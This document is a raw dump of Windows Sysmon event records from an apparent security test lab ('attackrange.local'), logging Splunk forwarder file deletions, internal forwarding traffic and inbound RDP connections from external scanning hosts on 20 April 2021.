AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51344-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051273Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:19.323{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A1558C38180D1C230296410BA7A3779,SHA256=FAA71FB6341EEE070452603D5796B03A342D52C35A7AEB09D274CB40A6F0224D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051272Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:19.167{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E82EAA9B8158AFACC614D85DFB01EF8,SHA256=DCE4B5086C853A210DA1A8FFB6CCDB3FD64E006721981803398804CE2E100EF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051271Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:17.116{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59662-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:20.775{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29AF75F1C3431786AB687747FF3D31F7,SHA256=FF32406B1DA78D870C9957C09D42475A481369BB1F2C06E443F586DBA5AAC071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051274Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:20.214{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3FF540F23BADA1BA3FF30C29A19334,SHA256=35A99D01F217305311C15BAB7C0CD1F37828D5482901D15C938794A7AB1F22B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:21.838{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81A1D7F295971763B1C555CAE53F1BD7,SHA256=A4EAC692283626E099C74958ED49AADF3E978CF6AE02A2D8AAEBBA876DAF88F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051277Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:21.230{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F14A61B060B7A2D25862A261828442,SHA256=A75C413A135ECF2665EA88B04DA8377D4F6C95ABA93F95321A70BC78372DC9D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051276Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:18.688{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61111-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051275Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:21.058{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9404B78547D48D88F52920D1E6D0EAF,SHA256=74317B7D0F4A99461A2AB9C3E29F7D33A1CF9F1C4A38321F568D4E7137F27DB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:22.853{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC79C63FF4D731024EAF3391B94CC965,SHA256=CEB23BECF144DF8BF13AA43222A3DE9E885D1B1A921CF88C4CFAFAB5188329E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:20.898{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-7305-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051279Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:22.948{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=782211B90D2EEE46D3D761E1B34D9687,SHA256=C278ED93520DB2A306EAB6EAB4419CFDE2FD75F161E30DE184EAE47D6EECFBC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051278Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:22.261{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08C8485CEC1F02C117BEDD69CBDC68DC,SHA256=9B53011F5FE1C49A55121B8D5FB45618C760ADE07079A28CBE7C3C18A7F733EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:23.900{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB87C16BC580CC984E3FA298F0805E6B,SHA256=244FC188D3E7D96DBD07BBC7775CBBEF32E41B1A855CE4C1AE2A07BC5B4D63F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:21.269{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54126-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:23.088{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1D08ABE396EE66D82CC37EE6E7DA623,SHA256=93EFDD37097249CAE8695C5A4674F3FD3F49173B322B1A3C24132D115F93161C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051282Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:23.855{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051281Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:23.308{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C51F9A0E2E0C70995CA291112237193,SHA256=5DB39C5A3A1CC8BE514CC32B70F3AE68C2591D03B69EC33C23EBB780B04019BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051280Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:20.264{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62560-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:24.931{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E06D020F85168ED2A3410AF5D1D0C16,SHA256=5016A3AFD0D8720A15D6A0D75C7BA74FE444A3C2E34BEA167950629FC58D83DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:23.229{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57682-false10.0.1.12-8000- 354300x800000000000000082587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:22.450{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-5957-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:24.213{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=23B25613C221C1FA2F2F4666691C1B19,SHA256=DB7CD740F8B8C47443E56F0C007E9415F8AEAA8F105FDF3A80AA4EC1EB94DA88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051285Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:24.339{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92068645E0265A6B23BA2D6FD935007F,SHA256=23B6D6813DA3A8365D28628E11B3B83C32D21902A94084F844D4393D46BF5E92,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051284Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:21.694{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52575-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000051283Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:21.206{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54290-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:25.681{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A7B331A074FCAF8F048E348DC771A898,SHA256=8491B5A61636BE97D9205764B3CD7C5F7A2338317ECBBF9C7C5280F3E33D46BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:24.171{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-10000-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:24.070{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-1913-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:23.716{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55883-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051289Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:25.995{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7A3470772867753B093B4DA389A3552,SHA256=A1FC3E062C71A1A2B523D58A9B81F7D5599DD2EBDC5941FF64ECFAEFD38217C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051288Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:25.355{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F58FCD84AFDE8438E5E440E94E21A7BF,SHA256=543E68845728EAF2625006368350F8CE7FFABA81B18CCDBB38853FDD899A9B53,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051287Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:23.459{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52576-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x800000000000000051286Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:23.446{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65462-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:26.072{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F25A293B2DF3C8D77E9496ADF35803DB,SHA256=679795CA6DC953617FA31D18BAC0C6980D348AD9E100C77FF4F3FE6D7D8AB585,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051290Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:26.369{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE43AC119803C68C29103B48ABE72500,SHA256=6D180E0D8ECA3762BBE9168CDEE41464A26100B48AB6398A50469636468CFC34,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:25.832{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-11347-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:27.431{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=710035696F1ADB766F22EE7045BFC09B,SHA256=776C543FF41AC15B4D8E81CB6170A24F80BF34A636D64094C0C54AF39CA7A5A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:27.103{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=660AA88F4ED0DA86F48DA70A2CABA450,SHA256=2DB0C761ADDB687F396A45D977A7B9900CE583BCAD323C2CF6ABA532718651D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051293Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:27.963{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5B6A87A137C0F4D767E2D2558C48B3B,SHA256=9748D69F6816796FDDF96DEAB1D2AEF282AAA61CC183A1C9397472EDCE02F007,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051292Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:27.385{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B0DE4378BAB43E5E687EA27CCB153EE,SHA256=9603A0512C850EB0CA042811DFB89C4C4803F28EFF9423FEE5B465C6F64DE696,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051291Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:24.886{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64010-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000082600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:27.165{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-12693-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:26.372{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60938-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:28.134{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0409A23222D52B4647508756D61EDFAD,SHA256=76D7E7989BB7FBA83FFFA5FD0880F880874A2453747A323B7A261DE5074A9F51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051296Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:28.401{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0768AB053FC5C7EFABE6738AB22D7121,SHA256=772AF2D111EB3B7C06017AF8DE380026E9F5BCBF9128BC676BCEB52D69E5C210,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051295Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:26.562{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52007-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051294Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:25.003{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50542-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051300Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:29.448{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26DA02340FC5763F97838C938754237A,SHA256=807A5018EA75F1C0F1B5DAAA774C05EE1B81C5EE4739C3C89E982167E0B59EF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051299Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:29.182{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1FC2C518A91CE4FAD9DB46B65FE5506,SHA256=E9824FF3E01F7BBC0045E48ED5D5689157E99D4509A74ECB4D10F0C36808F9D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051298Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:26.771{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52577-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000051297Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:26.671{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com61927-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051301Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:30.338{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E69AA398219B5A83CECD45FE8145623,SHA256=C31530EA38AAE0E939957C864E09C393F82DF83E4F5D6940F39AE8E30D8B65BC,IMPHASH=00000000000000000000000000000000falsetrue